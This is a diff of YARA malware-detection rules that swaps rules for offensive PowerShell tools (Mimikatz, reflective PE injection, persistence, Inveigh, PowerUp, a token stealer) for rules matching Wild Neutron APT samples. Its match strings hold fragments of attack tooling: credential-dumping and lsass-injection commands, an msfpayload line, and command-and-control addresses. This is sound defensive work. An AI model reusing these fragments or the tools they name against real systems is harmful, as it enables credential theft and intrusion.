 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "03e9a8c5e45781d73fd13c331d82802a18e4255b506e896019d6f08c5a67dedf"
-		score = 80
+		logic_hash = "05d6df161042a65f9eeec4be4046001a03fa61747a9ea123f13e6e75d6664ac7"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "24abe9f3f366a3d269f8681be80c99504dea51e50318d83ee42f9a4c7435999a"
 
 	strings:
-		$s1 = "Get-ProcAddress kernel32.dll WriteProcessMemory" fullword ascii
-		$s2 = "Get-ProcAddress kernel32.dll OpenProcess" fullword ascii
-		$s3 = "msfpayload windows/exec CMD=\"cmd /k calc\" EXITFUNC=thread C | sed '1,6d;s/[\";]//g;s/\\\\/,0/g' | tr -d '\\n' | cut -c2- " fullword ascii
-		$s4 = "inject shellcode into" ascii
-		$s5 = "Injecting shellcode" ascii
+		$s1 = "for %%G in (.pdf, .xls, .xlsx, .doc, .docx)" ascii
+		$s2 = "cmd /c copy"
+		$s3 = "forfiles"
 
 	condition:
-		( uint16( 0 ) == 0xbbef and filesize < 90KB and 1 of them ) or ( 3 of them )
+		filesize < 10KB and 2 of them
 }
-rule SIGNATURE_BASE_Ps1_Toolkit_Invoke_Mimikatz : FILE
+rule SIGNATURE_BASE_Wildneutron_Sample_1 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file Invoke-Mimikatz.ps1"
+		description = "Wild Neutron APT Sample Rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7c0252a1-fbe4-5519-949b-285073abb21f"
-		date = "2016-09-04"
+		id = "7bcb407f-7f01-540a-852c-a37456270888"
+		date = "2015-07-10"
 		modified = "2023-12-05"
-		reference = "https://github.com/vysec/ps1-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_toolkit.yar#L71-L90"
+		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wildneutron.yar#L10-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0bca6245befb5183f6a45406823c45267b0a31fb0d4505606b98025f6494f2cc"
-		score = 80
+		hash = "2b5065a3d0e0b8252a987ef5f29d9e1935c5863f5718b83440e68dc53c21fa94"
+		logic_hash = "d8044761fa51f2afd16eb096aa9e896483387c47e10ce922f2ef32ebcbd1a520"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5c31a2e3887662467cfcb0ac37e681f1d9b0f135e6dfff010aae26587e03d8c8"
 
 	strings:
-		$s1 = "Get-ProcAddress kernel32.dll WriteProcessMemory" fullword ascii
-		$s2 = "ps | where { $_.Name -eq $ProcName } | select ProcessName, Id, SessionId" fullword ascii
-		$s3 = "privilege::debug exit" ascii
-		$s4 = "Get-ProcAddress Advapi32.dll AdjustTokenPrivileges" fullword ascii
-		$s5 = "Invoke-Mimikatz -DumpCreds" fullword ascii
-		$s6 = "| Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002" fullword ascii
+		$s0 = "LiveUpdater.exe" fullword wide
+		$s1 = "id-at-postalAddress" fullword ascii
+		$s2 = "%d -> %d (default)" fullword wide
+		$s3 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide
+		$s8 = "id-ce-keyUsage" fullword ascii
+		$s9 = "Key Usage" fullword ascii
+		$s32 = "UPDATE_ID" fullword wide
+		$s37 = "id-at-commonName" fullword ascii
+		$s38 = "2008R2" fullword wide
+		$s39 = "RSA-alt" fullword ascii
+		$s40 = "%02d.%04d.%s" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0xbbef and filesize < 10000KB and 1 of them ) or ( 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them
 }
-rule SIGNATURE_BASE_Ps1_Toolkit_Invoke_Relfectivepeinjection : FILE
+rule SIGNATURE_BASE_Wildneutron_Sample_2 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file Invoke-RelfectivePEInjection.ps1"
+		description = "Wild Neutron APT Sample Rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "75ceb01e-103f-55b2-8362-42d22a35a36a"
-		date = "2016-09-04"
+		id = "1893c251-f81a-5361-91fa-f91a6d1379d2"
+		date = "2015-07-10"
 		modified = "2023-12-05"
-		reference = "https://github.com/vysec/ps1-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_toolkit.yar#L92-L111"
+		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wildneutron.yar#L36-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "910b8b1dbc7306369f90eae0dfd5949347b2c41fa0eb5f590aed8e90e8db199a"
-		score = 80
+		hash = "8d80f9ef55324212759f4b6070cb8fce18a008ae9dd8b9598553206654d13a6f"
+		logic_hash = "3a796199a2e9f2711e5fbdc1050234a8f3c09f762bc645f49a705d9f112d9cdc"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "510b345f821f93c1df5f90ac89ad91fcd0f287ebdabec6c662b716ec9fddb03a"
 
 	strings:
-		$x1 = "Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName (Get-Content targetlist.txt)" fullword ascii
-		$x2 = "Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName Target.local" fullword ascii
-		$x3 = "} = Get-ProcAddress Advapi32.dll OpenThreadToken" ascii
-		$x4 = "Invoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass -ComputerName Target.Local" fullword ascii
-		$s5 = "$PEBytes = [IO.File]::ReadAllBytes('DemoDLL_RemoteProcess.dll')" fullword ascii
-		$s6 = "= Get-ProcAddress Advapi32.dll AdjustTokenPrivileges" ascii
+		$s0 = "rundll32.exe \"%s\",#1" fullword wide
+		$s1 = "IgfxUpt.exe" fullword wide
+		$s2 = "id-at-postalAddress" fullword ascii
+		$s3 = "Intel(R) Common User Interface" fullword wide
+		$s4 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide
+		$s11 = "Key Usage" fullword ascii
+		$s12 = "Intel Integrated Graphics Updater" fullword wide
+		$s13 = "%sexpires on    : %04d-%02d-%02d %02d:%02d:%02d" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0xbbef and filesize < 700KB and 2 of them ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them
 }
-rule SIGNATURE_BASE_Ps1_Toolkit_Persistence : FILE
+rule SIGNATURE_BASE_Wildneutron_Sample_3 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file Persistence.ps1"
+		description = "Wild Neutron APT Sample Rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "38115391-75ac-5ba8-b31b-dcf4c66179b0"
-		date = "2016-09-04"
+		id = "1c5d1442-b2be-5a34-b5c9-78aaf67072c4"
+		date = "2015-07-10"
 		modified = "2023-12-05"
-		reference = "https://github.com/vysec/ps1-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_toolkit.yar#L113-L134"
+		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wildneutron.yar#L59-L83"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bfe6b20fb712fcf7b45d0ef80075bc9a254867d2251109f377a378f887b38494"
-		score = 80
+		hash = "c2c761cde3175f6e40ed934f2e82c76602c81e2128187bab61793ddb3bc686d0"
+		logic_hash = "16d511412576df2eb6d9646856d37bd94af7648cc602510696b74fa0534e405d"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e1a4dd18b481471fc25adea6a91982b7ffed1c2d393c8c17e6e542c030ac6cbd"
 
 	strings:
-		$s1 = "\"`\"```$Filter=Set-WmiInstance -Class __EventFilter -Namespace ```\"root\\subscription```" ascii
-		$s2 = "}=$PROFILE.AllUsersAllHosts;${" ascii
-		$s3 = "C:\\PS> $ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup" ascii
-		$s4 = "= gwmi Win32_OperatingSystem | select -ExpandProperty OSArchitecture" ascii
-		$s5 = "-eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MAAxADQAQwA='))))" ascii
-		$s6 = "}=$PROFILE.CurrentUserAllHosts;${" ascii
-		$s7 = "FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')" ascii
-		$s8 = "[System.Text.AsciiEncoding]::ASCII.GetString($MZHeader)" fullword ascii
+		$x1 = "178.162.197.9" fullword ascii
+		$x2 = "\"http://fw.ddosprotected.eu:80 /opts resolv=drfx.chickenkiller.com\"" fullword wide
+		$s1 = "LiveUpdater.exe" fullword wide
+		$s2 = "id-at-postalAddress" fullword ascii
+		$s3 = "%d -> %d (default)" fullword wide
+		$s4 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide
+		$s5 = "id-at-serialNumber" fullword ascii
+		$s6 = "ECDSA with SHA256" fullword ascii
+		$s7 = "Acer LiveUpdater" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0xbbef and filesize < 200KB and 2 of them ) or ( 4 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 2020KB and ( 1 of ( $x* ) or all of ( $s* ) )
 }
-rule SIGNATURE_BASE_Ps1_Toolkit_Invoke_Mimikatz_Relfectivepeinjection : FILE
+rule SIGNATURE_BASE_Wildneutron_Sample_4 : FILE
 {
 	meta:
-		description = "Auto-generated rule - from files Invoke-Mimikatz.ps1, Invoke-RelfectivePEInjection.ps1"
+		description = "Wild Neutron APT Sample Rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e9471f95-48e1-57e0-b0be-f916c574a6a7"
-		date = "2016-09-04"
+		id = "52ff5770-1ca4-54d9-b69d-8af0c392084e"
+		date = "2015-07-10"
 		modified = "2023-12-05"
-		reference = "https://github.com/vysec/ps1-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_toolkit.yar#L136-L162"
+		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wildneutron.yar#L85-L108"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "220597cb76c189adc33a9ac740c8164b52743f61523898aefb7a74206b23b76b"
-		score = 80
+		hash = "b4005530193bc523d3e0193c3c53e2737ae3bf9f76d12c827c0b5cd0dcbaae45"
+		logic_hash = "4882b7c5f469615436490cd628ee3bb5b0dded43fb556ac6477cdadc6c8eff05"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "5c31a2e3887662467cfcb0ac37e681f1d9b0f135e6dfff010aae26587e03d8c8"
-		hash2 = "510b345f821f93c1df5f90ac89ad91fcd0f287ebdabec6c662b716ec9fddb03a"
 
 	strings:
-		$s1 = "[IntPtr]$DllAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])" fullword ascii
-		$s2 = "if ($GetCommandLineAAddr -eq [IntPtr]::Zero -or $GetCommandLineWAddr -eq [IntPtr]::Zero)" fullword ascii
-		$s3 = "[Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb)" fullword ascii
-		$s4 = "Function Import-DllInRemoteProcess" fullword ascii
-		$s5 = "FromBase64String('QwBvAG4AdABpAG4AdQBlAA==')))" fullword ascii
-		$s6 = "[Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb)" fullword ascii
-		$s7 = "[System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesMem)" fullword ascii
-		$s8 = "[System.Runtime.InteropServices.Marshal]::StructureToPtr($CurrAddr, $FinalAddr, $false) | Out-Null" fullword ascii
-		$s9 = "::FromBase64String('RABvAG4AZQAhAA==')))" ascii
-		$s10 = "Write-Verbose \"PowerShell ProcessID: $PID\"" fullword ascii
-		$s11 = "[IntPtr]$ProcAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])" fullword ascii
+		$x1 = "WinRAT-Win32-Release.exe" fullword ascii
+		$s0 = "rundll32.exe \"%s\",#1" fullword wide
+		$s1 = "RtlUpd.EXE" fullword wide
+		$s2 = "RtlUpd.exe" fullword wide
+		$s3 = "Driver Update and remove for Windows x64 or x86_32" fullword wide
+		$s4 = "Realtek HD Audio Update and remove driver Tool" fullword wide
+		$s5 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide
+		$s6 = "Key Usage" fullword ascii
+		$s7 = "id-at-serialNumber" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0xbbef and filesize < 10000KB and 3 of them ) or ( 6 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1240KB and all of them
 }
-rule SIGNATURE_BASE_Ps1_Toolkit_Inveigh_Bruteforce_2 : FILE
+rule SIGNATURE_BASE_Wildneutron_Sample_5 : FILE
 {
 	meta:
-		description = "Auto-generated rule - from files Inveigh-BruteForce.ps1"
+		description = "Wild Neutron APT Sample Rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1319b03d-67e8-5155-8037-e3375e39f6a0"
-		date = "2016-09-04"
+		id = "0df63255-155d-56b9-b86b-491855983095"
+		date = "2015-07-10"
 		modified = "2023-12-05"
-		reference = "https://github.com/vysec/ps1-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_toolkit.yar#L164-L181"
+		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wildneutron.yar#L110-L133"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5c035898a9574e2516cbc66efcf57f7380fd979c4a5099f8a0a190ad21af32c0"
-		score = 80
+		hash = "1604e36ccef5fa221b101d7f043ad7f856b84bf1a80774aa33d91c2a9a226206"
+		logic_hash = "57792a54c96c59a1e9ed961715c72187936aee6f001c2ed4f95ca84e799e9c8c"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a2ae1e02bcb977cd003374f551ed32218dbcba3120124e369cc150b9a63fe3b8"
 
 	strings:
-		$s1 = "}.NTLMv2_file_queue[0]|Out-File ${" ascii
-		$s2 = "}.NTLMv2_file_queue.RemoveRange(0,1)" ascii
-		$s3 = "}.NTLMv2_file_queue.Count -gt 0)" ascii
-		$s4 = "}.relay_running = $false" ascii
+		$s0 = "LiveUpdater.exe" fullword wide
+		$s1 = "id-at-postalAddress" fullword ascii
+		$s2 = "%d -> %d (default)" fullword wide
+		$s3 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide
+		$s4 = "sha-1WithRSAEncryption" fullword ascii
+		$s5 = "Postal code" fullword ascii
+		$s6 = "id-ce-keyUsage" fullword ascii
+		$s7 = "Key Usage" fullword ascii
+		$s8 = "TLS-RSA-WITH-3DES-EDE-CBC-SHA" fullword ascii
+		$s9 = "%02d.%04d.%s" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0xbbef and filesize < 200KB and 2 of them ) or ( 4 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
 }
-rule SIGNATURE_BASE_Ps1_Toolkit_Powerup_2 : FILE
+rule SIGNATURE_BASE_Wildneutron_Sample_6 : FILE
 {
 	meta:
-		description = "Auto-generated rule - from files PowerUp.ps1"
+		description = "Wild Neutron APT Sample Rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "11322a66-67d4-574b-acef-35d06e6f95f4"
-		date = "2016-09-04"
+		id = "c5d87cad-d1ca-5766-90c1-fc8ecfa3f14f"
+		date = "2015-07-10"
 		modified = "2023-12-05"
-		reference = "https://github.com/vysec/ps1-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_toolkit.yar#L183-L202"
+		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wildneutron.yar#L135-L149"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8cbd86f103d8b49e72787cbb85fc97e6a02d5332039ce29359cb673c273760b7"
-		score = 80
+		hash = "4bd548fe07b19178281edb1ee81c9711525dab03dc0b6676963019c44cc75865"
+		logic_hash = "7dc7f9815f2b2c934ecf93f5813bdb87364b2b9e2a5aebc04f76cfff43e46d30"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fc65ec85dbcd49001e6037de9134086dd5559ac41ac4d1adf7cab319546758ad"
 
 	strings:
-		$s1 = "if($MyConString -like $([Text.Encoding]::Unicode.GetString([Convert]::" ascii
-		$s2 = "FromBase64String('KgBwAGEAcwBzAHcAbwByAGQAKgA=')))) {" ascii
-		$s3 = "$Null = Invoke-ServiceStart" ascii
-		$s4 = "Write-Warning \"[!] Access to service $" ascii
-		$s5 = "} = $MyConString.Split(\"=\")[1].Split(\";\")[0]" ascii
-		$s6 = "} += \"net localgroup ${" ascii
+		$s0 = "mshtaex.exe" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0xbbef and filesize < 2000KB and 2 of them ) or ( 4 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 310KB and all of them
 }
-rule SIGNATURE_BASE_Ps1_Toolkit_Persistence_2 : FILE
+rule SIGNATURE_BASE_Wildneutron_Sample_7 : FILE
 {
 	meta:
-		description = "Auto-generated rule - from files Persistence.ps1"
+		description = "Wild Neutron APT Sample Rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d79c328b-4471-52bb-882c-12d2e1302c1e"
-		date = "2016-09-04"
+		id = "22561c55-4294-50c9-a9b9-7b4ed98eec09"
+		date = "2015-07-10"
 		modified = "2023-12-05"
-		reference = "https://github.com/vysec/ps1-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_toolkit.yar#L204-L226"
+		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wildneutron.yar#L151-L176"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "47d1c3593edeba02e1c08cc53b4ba3d375b73dd04816b84e807e28be2bcf917e"
-		score = 80
+		hash = "a14d31eb965ea8a37ebcc3b5635099f2ca08365646437c770212d534d504ff3c"
+		logic_hash = "8a081932be8fd03c37a87486570a02a31756ba6bd125dbed7da9703197447ea5"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e1a4dd18b481471fc25adea6a91982b7ffed1c2d393c8c17e6e542c030ac6cbd"
 
 	strings:
-		$s1 = "FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')" ascii
-		$s2 = "FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBEAGEAaQBsAHkA')" ascii
-		$s3 = "FromBase64String('UAB1AGIAbABpAGMALAAgAFMAdABhAHQAaQBjAA==')" ascii
-		$s4 = "[Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )]" ascii
-		$s5 = "FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAHQATABvAGcAbwBuAA==')))" ascii
-		$s6 = "[Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )]" fullword ascii
-		$s7 = "FromBase64String('TQBlAHQAaABvAGQA')" ascii
-		$s8 = "FromBase64String('VAByAGkAZwBnAGUAcgA=')" ascii
-		$s9 = "[Runtime.InteropServices.CallingConvention]::Winapi," fullword ascii
+		$s0 = "checking match for '%s' user %s host %s addr %s" fullword ascii
+		$s1 = "PEM_read_bio_PrivateKey failed" fullword ascii
+		$s2 = "usage: %s [-ehR] [-f log_facility] [-l log_level] [-u umask]" fullword ascii
+		$s3 = "%s %s for %s%.100s from %.200s port %d%s" fullword ascii
+		$s4 = "clapi32.dll" fullword ascii
+		$s5 = "Connection from %s port %d" fullword ascii
+		$s6 = "/usr/etc/ssh_known_hosts" fullword ascii
+		$s7 = "Version: %s - %s %s %s %s" fullword ascii
+		$s8 = "[-] connect()" fullword ascii
+		$s9 = "/bin/sh /usr/etc/sshrc" fullword ascii
+		$s10 = "kexecdhs.c" fullword ascii
+		$s11 = "%s: setrlimit(RLIMIT_FSIZE, { 0, 0 }): %s" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0xbbef and filesize < 200KB and 2 of them ) or ( 4 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and all of them
 }
-rule SIGNATURE_BASE_Ps1_Toolkit_Inveigh_Bruteforce_3 : FILE
+rule SIGNATURE_BASE_Wildneutron_Sample_9 : FILE
 {
 	meta:
-		description = "Auto-generated rule - from files Inveigh-BruteForce.ps1"
+		description = "Wild Neutron APT Sample Rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d284e93b-dd65-5a39-84e2-287feb6ae05b"
-		date = "2016-09-04"
-		modified = "2023-12-05"
-		reference = "https://github.com/vysec/ps1-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_toolkit.yar#L228-L248"
+		id = "dbfdbe8c-4a4a-5512-a03d-e9f80c853d48"
+		date = "2015-07-10"
+		modified = "2023-01-06"
+		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wildneutron.yar#L203-L223"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "09afe669e90bd73318a9f9f68fda362451f6611f8585de67176c5dc43f05f937"
-		score = 80
+		hash = "781eb1e17349009fbae46aea5c59d8e5b68ae0b42335cb035742f6b0f4e4087e"
+		logic_hash = "2029c94088e075cbcbae8d7d514cfc56add022d8776e59f04824d9ce9fd12794"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash3 = "a2ae1e02bcb977cd003374f551ed32218dbcba3120124e369cc150b9a63fe3b8"
 
 	strings:
-		$s1 = "::FromBase64String('TgBUAEwATQA=')" ascii
-		$s2 = "::FromBase64String('KgBTAE0AQgAgAHIAZQBsAGEAeQAgACoA')))" ascii
-		$s3 = "::FromBase64String('KgAgAGYAbwByACAAcgBlAGwAYQB5ACAAKgA=')))" ascii
-		$s4 = "::FromBase64String('KgAgAHcAcgBpAHQAdABlAG4AIAB0AG8AIAAqAA==')))" ascii
-		$s5 = "[Byte[]] $HTTP_response = (0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20)`" fullword ascii
-		$s6 = "KgAgAGwAbwBjAGEAbAAgAGEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIAAqAA" ascii
-		$s7 = "}.bruteforce_running)" ascii
+		$s0 = "http://get.adobe.com/flashplayer/" wide
+		$s4 = " Player Installer/Uninstaller" fullword wide
+		$s5 = "Adobe Flash Plugin Updater" fullword wide
+		$s6 = "uSOFTWARE\\Adobe" fullword wide
+		$s11 = "2008R2" fullword wide
+		$s12 = "%02d.%04d.%s" fullword wide
+		$s13 = "%d -> %d" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0xbbef and filesize < 200KB and 2 of them ) or ( 4 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1477KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_Koh_Tokenstealer : FILE
+rule SIGNATURE_BASE_Wildneutron_Sample_10 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project."
-		author = "Will Schroeder (@harmj0y)"
-		id = "76b6cc9f-5db7-5e9b-939c-e713bad8137a"
-		date = "2023-12-05"
+		description = "Wild Neutron APT Sample Rule"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5654a36f-8502-5e18-b8f3-94d4add466a7"
+		date = "2015-07-10"
 		modified = "2023-12-05"
-		reference = "https://github.com/GhostPack/Koh"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_hktl_koh_tokenstealer.yar#L2-L18"
+		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wildneutron.yar#L225-L267"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e2c4d948e23f1a3a92689f35fedde6e041d09cd88deac9ff3249556be0b8f789"
-		score = 75
-		quality = 85
+		hash = "1d3bdabb350ba5a821849893dabe5d6056bf7ba1ed6042d93174ceeaa5d6dad7"
+		logic_hash = "b282b6892f9cb6769bf0e302deaa8062fd69bfd51144bc06fc9501fde9537dae"
+		score = 60
+		quality = 83
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x_typelibguid = "4d5350c8-7f8c-47cf-8cde-c752018af17e" ascii
-		$s1 = "[*] Already SYSTEM, not elevating" wide fullword
-		$s2 = "S-1-[0-59]-\\d{2}-\\d{8,10}-\\d{8,10}-\\d{8,10}-[1-9]\\d{2}" wide
-		$s3 = "0x[0-9A-Fa-f]+$" wide
-		$s4 = "\\Koh.pdb" ascii
+		$n1 = "/c for /L %%i in (1,1,2) DO ping 127.0.0.1 -n 3 & type %%windir%%\\notepad.exe > %s & del /f %s" fullword ascii
+		$s1 = "%SYSTEMROOT%\\temp\\_dbg.tmp" fullword ascii
+		$s2 = "%SYSTEMROOT%\\SysWOW64\\mspool.dll" fullword ascii
+		$s3 = "%SYSTEMROOT%\\System32\\dpcore16t.dll" fullword ascii
+		$s4 = "%SYSTEMROOT%\\System32\\wdigestEx.dll" fullword ascii
+		$s5 = "%SYSTEMROOT%\\System32\\mspool.dll" fullword ascii
+		$s6 = "%SYSTEMROOT%\\System32\\kernel32.dll" fullword ascii
+		$s7 = "%SYSTEMROOT%\\SysWOW64\\iastor32.exe" fullword ascii
+		$s8 = "%SYSTEMROOT%\\System32\\msvcse.exe" fullword ascii
+		$s9 = "%SYSTEMROOT%\\System32\\mshtaex.exe" fullword ascii
+		$s10 = "%SYSTEMROOT%\\System32\\iastor32.exe" fullword ascii
+		$s11 = "%SYSTEMROOT%\\SysWOW64\\mshtaex.exe" fullword ascii
+		$x1 = "wdigestEx.dll" fullword ascii
+		$x2 = "dpcore16t.dll" fullword ascii
+		$x3 = "mspool.dll" fullword ascii
+		$x4 = "msvcse.exe" fullword ascii
+		$x5 = "mshtaex.exe" fullword wide
+		$x6 = "iastor32.exe" fullword ascii
+		$y1 = "Installer.exe" fullword ascii
+		$y2 = "Info: Process %s" fullword ascii
+		$y3 = "Error: GetFileTime %s 0x%x" fullword ascii
+		$y4 = "Install succeeded" fullword ascii
+		$y5 = "Error: RegSetValueExA 0x%x" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 1 of ( $x* ) or 3 of them
